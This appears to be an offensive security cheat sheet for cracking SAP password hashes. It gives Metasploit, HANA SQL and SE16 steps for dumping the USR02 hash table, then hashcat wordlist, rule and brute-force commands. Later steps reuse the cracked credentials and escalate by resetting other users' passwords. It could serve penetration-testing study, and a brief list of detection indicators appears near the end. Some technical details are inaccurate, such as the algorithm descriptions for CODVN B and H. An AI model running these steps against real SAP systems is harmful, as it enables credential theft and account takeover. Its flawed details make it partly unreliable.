SAP Password Cracking

SAP stores password hashes in the USR02 database table. This note covers how to extract them and crack them efficiently with hashcat. Start with CODVN B — it's the weakest and most likely to yield results fast.

Hash Types — CODVN Reference

SAP uses multiple password hash algorithms in parallel, controlled by the CODVN field in USR02.

CODVNColumn in USR02AlgorithmMax LengthNotes
BBCODEMD5 (DES-based variant)8 charsUppercase only — trivially crackable
DBCODESame as B, different salt8 chars
FPASSCODESHA-1 basedFull lengthStronger — but still worth cracking
GMulti-columnSHA-256Full length
HPWDSALTEDHASHSHA-256 + PBKDF2Full lengthStrongest — focus on B/F first
IMulti-columnMultiple simultaneousFull lengthAll hashes stored

Key insight: SAP generates and stores all applicable hash types simultaneously when a password is set. If the system parameter login/password_downwards_compatibility is enabled, even complex modern passwords generate a weak CODVN B hash. Crack B first — it gives you the uppercase version of the password which you can use to build a targeted wordlist for H.

Step 1 — Extract Hashes from USR02

Method A: Metasploit RFC Module (Preferred)

This module uses RFC_ABAP_INSTALL_AND_RUN to run native SQL, extracting full raw hash values (bypasses the RFC_READ_TABLE truncation issue).

msf > use auxiliary/scanner/sap/sap_rfc_usr02
msf > set RHOSTS <target>
msf > set RPORT 3300
msf > set CLIENT 000
msf > set USERNAME <user>
msf > set PASSWORD <pass>
msf > run

# Output saved to: ~/.msf4/loot/<date>_sap_usr02_*.txt

Method B: Direct HANA SQL (If DB Access Available)

# Connect to SAP HANA
hdbsql -n <host>:30015 -u <dbuser> -p <dbpass>

# Extract all non-empty hashes
hdbsql -n localhost -U DEFAULT \
  "SELECT MANDT,BNAME,BCODE,GLTGB,PWDSTATE,PASSCODE,PWDSALTEDHASH \
   FROM USR02 WHERE BCODE != 0x0000000000000000"

# For Oracle/MSSQL backends — same query via DB admin access

Method C: RFC_READ_TABLE (Partial — BCODE Only)

RFC_READ_TABLE truncates RAW fields — you'll only get the first half of BCODE. Useful for CODVN B partial attacks (hashcat modes 7701/7801).

msf > use auxiliary/scanner/sap/sap_rfc_read_table
msf > set RHOSTS <target>
msf > set RPORT 3300
msf > set CLIENT 000
msf > set USERNAME <user>
msf > set PASSWORD <pass>
msf > set QUERY "SELECT MANDT,BNAME,BCODE,PASSCODE FROM USR02"
msf > run

Method D: Transaction SE16 / SE16N (Inside SAP GUI)

If you have access to the SAP GUI with any account that can open SE16:

Transaction: SE16
Table: USR02
Fields: MANDT, BNAME, BCODE, PASSCODE, PWDSALTEDHASH
Execute -> Export as local file

Step 2 — Prepare Hash Files

CODVN B and F Format

# Format: <username>$<hash>
ADMIN$1F2A3B4C5D6E7F8A
BASIS$AABBCCDD11223344

CODVN H Format

# Format: hash only (no username prefix)
{x-issha, 1024}<base64-encoded-hash>

Step 3 — Crack with Hashcat

Wordlist Attack (Simplest — Try First)

# CODVN B — full hash
hashcat -a 0 -m 7700 hashes_b.txt /usr/share/wordlists/rockyou.txt

# CODVN F — full hash
hashcat -a 0 -m 7800 hashes_f.txt /usr/share/wordlists/rockyou.txt

# CODVN H — PBKDF2-SHA256
hashcat -a 0 -m 10300 hashes_h.txt /usr/share/wordlists/rockyou.txt

Partial Hash Attack (RFC_READ_TABLE truncated output)

# CODVN B — partial (first half only)
hashcat -a 0 -m 7701 partial_hashes_b.txt /usr/share/wordlists/rockyou.txt

# CODVN F — partial
hashcat -a 0 -m 7801 partial_hashes_f.txt /usr/share/wordlists/rockyou.txt

Rule-Based Attack

# Add rules to the wordlist for password mutations
hashcat -a 0 -m 7700 hashes_b.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -a 0 -m 7800 hashes_f.txt rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

Brute Force (CODVN B — Max 8 Chars, Uppercase)

# CODVN B: max 8 uppercase chars, digits only
hashcat -a 3 -m 7700 hashes_b.txt '?u?u?u?u?u?u?u?u'

# Combine charset
hashcat -a 3 -m 7700 hashes_b.txt '?u?u?u?d?d?d?d?d'

Hashcat Mode Reference

ModeHash TypeNotes
7700SAP CODVN B (full)MD5-based, 8 char max, uppercase
7701SAP CODVN B (partial)From RFC_READ_TABLE truncated output
7800SAP CODVN F (full)SHA-1 based
7801SAP CODVN F (partial)From RFC_READ_TABLE truncated output
10300SAP CODVN HPBKDF2-SHA256, strongest

Step 4 — Use Cracked Credentials

CODVN B Output Is Uppercase

CODVN B hashes store passwords in uppercase. The cracked result will be uppercase — use it to reconstruct the real password:

Cracked CODVN B: PASSWORD123
Real password options: Password123 / password123 / Password1234 / etc.

Build a case-mutation wordlist:
hashcat --stdout PASSWORD123 -r toggles.rule > mutations.txt
hashcat -a 0 -m 7800 hashes_f.txt mutations.txt

Log In and Check Permissions

# Test credentials via RFC
msf > use auxiliary/scanner/sap/sap_rfc_bruteforce
msf > set USERNAME <cracked_user>
msf > set PASSWORD <cracked_pass>
msf > run

# Or via SAP GUI (saplogon) with system ID, host, port 3200

Escalate via Password Reset (If Auth Object Present)

If your user has S_USER_GRP with ACTVT=22 (change password):

Transaction: SU01
-> Open any user
-> Change password -> set known value
-> Log in as that user

Detection Indicators

Watch for these in SAP Security Audit Log (transaction SM20):

  • Multiple failed logon attempts (brute force)
  • RFC calls to RFC_READ_TABLE targeting USR02/USH02
  • RFC_ABAP_INSTALL_AND_RUN calls from unusual sources
  • Login with SAP* or DDIC accounts after long dormancy
  • Logon from unexpected IP ranges

Quick Command Index

GoalCommand
Extract hashes via RFCmsf > use auxiliary/scanner/sap/sap_rfc_usr02
Extract partial hashesmsf > use auxiliary/scanner/sap/sap_rfc_read_table
Crack CODVN B (full)hashcat -a 0 -m 7700 hashes.txt wordlist.txt
Crack CODVN B (partial)hashcat -a 0 -m 7701 hashes.txt wordlist.txt
Crack CODVN F (full)hashcat -a 0 -m 7800 hashes.txt wordlist.txt
Crack CODVN F (partial)hashcat -a 0 -m 7801 hashes.txt wordlist.txt
Crack CODVN Hhashcat -a 0 -m 10300 hashes.txt wordlist.txt
Direct HANA queryhdbsql -n localhost -U DEFAULT "SELECT ... FROM USR02"
In-SAP table browseSE16 -> USR02